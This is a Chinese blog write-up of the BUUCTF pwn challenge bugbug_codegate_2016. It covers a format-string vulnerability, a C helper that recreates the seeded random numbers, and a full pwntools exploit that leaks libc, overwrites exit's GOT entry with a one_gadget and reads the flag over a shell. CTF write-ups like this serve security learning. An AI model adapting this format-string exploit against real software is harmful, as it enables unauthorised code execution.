[BUUCTF-pwn] bugbug_codegate_2016

最新推荐文章于 2022-05-20 20:59:51 发布
最新推荐文章于 2022-05-20 20:59:51 发布
阅读量682 收藏 1
点赞数
分类专栏: CTF pwn 文章标签: c语言 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121338507
版权

printf的题是连着了,刚作完一上又一个

先看保护:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8047000)

加载地址是固定的,不用泄露,got表可写

再看看程序:

  stream = fopen("/dev/urandom", "rb");
  fread(&ptr, 4u, 1u, stream);
  fclose(stream);
  srand(ptr);                        //读4字节随机数作随机数种子,因为紧临buf可以被带出
  printf("\nWho are you? ");
  read(0, buf, 0x64u);
  printf("\nHello~ %s\n", buf);                 // 可以带出buf
  for ( dword_804A05C = 0; dword_804A05C <= 5; ++dword_804A05C )
  {
LABEL_6:
    dword_804A058 = rand() % 45 + 1;
    for ( dword_804A054 = 0; dword_804A05C - 1 >= dword_804A054; ++dword_804A054 )
    {
      if ( v4[dword_804A054] == dword_804A058 )
        goto LABEL_6;
    }
    v4[dword_804A05C] = dword_804A058;   //生成6个随机数
  }
  sub_804867B(v3);                              // 读入6个数与随机数比较
  result = sub_804871B(v3, v4);
  if ( result )
  {
    printf("Congratulation, ");
    printf(buf);                //调用printf
    puts("You Win!!\n");
    exit(0);                    //在定得作个循环回去
  }

程序分析:

  1. 先读4字节作为随机数种子,这个与buf紧邻又是read读入可以被带出,顺便后边的libc也被带出
  2. 用种子生成6个随机数,然后读入6个数比较。过了这个冒才有printf漏洞
  3. 用exit(0)退出,在这需要弄个循环,因为一步完不成。

先要弄个小程序,输入种子按原程序的方法生成随机数(除了scanf外都是复制过来,尽量避免不同)

#include <stdio.h>
#include <stdlib.h>

int main()
{
	int v4[6];
	int i,j,k;
	unsigned int ptr;
	
	puts("Input seed :");
	scanf("%d", &ptr);
	
	for(i=0;i<6;i++)v4[i]=0;
	srand(ptr);
	for(i=0;i<6;++i)
	{
LABEL6:
		k = rand()%45+1;
		for(j=0;j<=i-1;++j)
			if(v4[j] == k)goto LABEL6;
		v4[i]=k;
	}
	for(i=0;i<6;i++)printf("%d,",v4[i]);
	return 0;
}

步骤:

  1. 输入AAAA-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x 计算偏移
  2. payload要输满100位,带出seed,libc
  3. 调用小程序输入seed获得6个随机数
  4. 输入随机数,成功运行printf 
  5. 从1重来,payload=fmtstr_payload(17, {elf.got['exit'] : main}) 这回运行让它循环回来
  6. payload = fmtstr_payload(17, {elf.got['exit']: one_gadget}) 调用one_gadget得到shell

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/libc6-i386_2.23-0ubuntu11.3/libc-2.23.so")
    one = [0x3a81c,0x3a81e,0x3a822,0x3a829,0x5f075,0x5f076]
    offset_main_ret = 0x18647
else:
    p = remote('node4.buuoj.cn', 26373) 
    libc_elf = ELF('../libc6-i386_2.23-0ubuntu10_amd64.so')
    one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
    offset_main_ret = 0x18637

elf = ELF('./pwn')
context(arch='i386', log_level='debug')

#gdb.attach(p, 'b*0x804892e')
#pause()

#payload = b'AAAA-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x'
#AAAA-ffece45c-0-804888b-f7fada74-8-a-10-14-19-f-8-a-10-14-19-f-41414141-2d78252d
offset = 17
main = 0x804878c
payload = fmtstr_payload(17, {elf.got['exit'] : main})
p.sendafter(b"\nWho are you? ", payload.ljust(99, b'A')+b'|')
p.recvuntil(b'|')
seed = u32(p.recv(4))
print('seed:', seed, hex(seed))

#seed ->rand
tmpp = process('./a.out')
tmpp.sendlineafter(b':\n', str(seed).encode())
rnd = [0,0,0,0,0,0]
for i in range(6):
    rnd[i] = int(tmpp.recvuntil(b',', drop=True))
    print(rnd[i])
tmpp.close()

libc_base = u32(p.recv(8)[4:]) - (0xf7fa53dc - 0xf7df5000)
print('libc:', hex(libc_base))

p.recvuntil(b'==> ')
for i in range(6):
    p.sendline(str(rnd[i]).encode())

#p.sendlineafter(b"Congratulation, ", )
p.recvuntil(b"You Win!!\n\n")

# back top
one_gadget = libc_base + one[5]
payload = fmtstr_payload(17, {elf.got['exit'] : one_gadget})

p.sendafter(b"\nWho are you? ", payload.ljust(99, b'A')+b'|')
p.recvuntil(b'|')
seed = u32(p.recv(4))
print('seed:', seed, hex(seed))

#seed ->rand
tmpp = process('./a.out')
tmpp.sendlineafter(b':\n', str(seed).encode())
rnd = [0,0,0,0,0,0]
for i in range(6):
    rnd[i] = int(tmpp.recvuntil(b',', drop=True))
    print(rnd[i])
tmpp.close()

libc_base = u32(p.recv(8)[4:]) - (0xf7fa53dc - 0xf7df5000)
print('libc:', hex(libc_base))

p.recvuntil(b'==> ')
for i in range(6):
    p.sendline(str(rnd[i]).encode())

p.recvuntil(b"You Win!!\n\n")

p.sendline(b'cat /flag')
p.interactive()

程序后边复制的前边,用函数会变短,但不如复制效率高,都高程序员爱划水:)

Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF刷题1
m0_51251108的博客
05-19 368
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
[BUUCTF-pwn] poke_naxtos_sthack_2016
weixin_52640415的博客
12-28 402
一个看似简单的问题,输入隐藏菜单41,然后输入密码,原文里有,然后输入一个长串溢出。 本地没有一点问题,但远程不行:没有输出! 测试发现输入1,2,3都有输出 int map() { puts("Vous etes ici."); return fflush(stdout); } 因为他有flush(stdout) 于是把原题都加上个1,就能得到输出了 from pwn import * local = 0 if local == 1: p = process('./pwn
[XCTF-pwn] 19-dubblesort
weixin_52640415的博客
03-03 208
冒泡排序。 漏洞: 对排序数字个数无限制 栈结构: 8个排序数字 16 名字 canary 其它7 libc_start_main_ret 思路: 输入 0*24,-,main*7,-,main 当canary小于main时排序结果为0*24, canary, main*8, libc_start_mian_ret。可以得到libc地址,并用main覆盖返回地址。回到main函数。 第2次输入0*24,canary*5,system*2,bin_sh排序后无变化,覆盖到返回地址 完整e
php中的random无法使用,php – / dev / urandom错误(webhost拒绝权限)
weixin_42697609的博客
03-19 656
我正在使用功能:private function random($len) {if (@is_readable('/dev/urandom')) {$f=fopen('/dev/urandom', 'r');$urandom=fread($f, $len);fclose($f);}$return='';for ($i=0;$iif (!isset($urandom)) {if ($i%2==0) ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuojCTF [WUSTCTF2020]level11
kevinhezhuzhu的博客
05-20 284
下载文件发现有两个文件,其中有一个txt文件,里面有一些数字。 不知道是啥,把另一个文件拖进ida,很容易找到main函数。 int __cdecl main(int argc, const char **argv, const char **envp) { FILE *stream; // ST08_8@1 int result; // eax@7 __int64 v5; // rcx@7 signed int i; // [sp+4h] [bp-2Ch]@1 char pt
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 696
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
codegate-quals-2013-vuln100
weixin_38168081的博客
10-04 96
最近想多看看题目积累些经验, -------- 程序分析 64位,保护措施都没开 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial 只是利用过程还饶了下,简单说下利...
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 464
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
[BUUCTF]PWN——bjdctf_2020_babyrop2
mcmuyanga的博客
11-05 1352
bjdctf_2020_babyrop2 附件 步骤: 例行检查,64位程序,开启了NX和canary保护 2. 试运行一下程序,看看大概的情况 提示我们去泄露libc 3. 64位ida载入,从main函数开始看程序 init gift 第9行的printf函数存在格式化字符串漏洞,可以利用这点去泄露canary的值 vuln buf参数存在溢出漏洞,只要绕过了canary就能够利用ret2libc的方法获取shell 利用思路: 利用格式化字符串泄露出canary的值 利用溢出漏洞,
BUU-REVERSE-rsa
Nobug_的博客
05-23 445
BUU REVERSE rsa 1. 打开后发现了这两个文件 不用多说flag.enc 文件应该是加密后的东西 那么我们就直接先看pub.key里面的东西 -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMAzLFxkrkcYL2wch21CM2kQVFpY9+7+ /AvKr1rzQczdAgMBAAE= -----END PUBLIC KEY----- 2 猜测应该是RSA算法的一个公钥 RSA公私钥分解 公钥指数及模数信
BUUCTF—WEB-WarmUp
热门推荐
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
PWN 网鼎杯 GUESS
SsMing的博客
09-11 1831
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1221
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值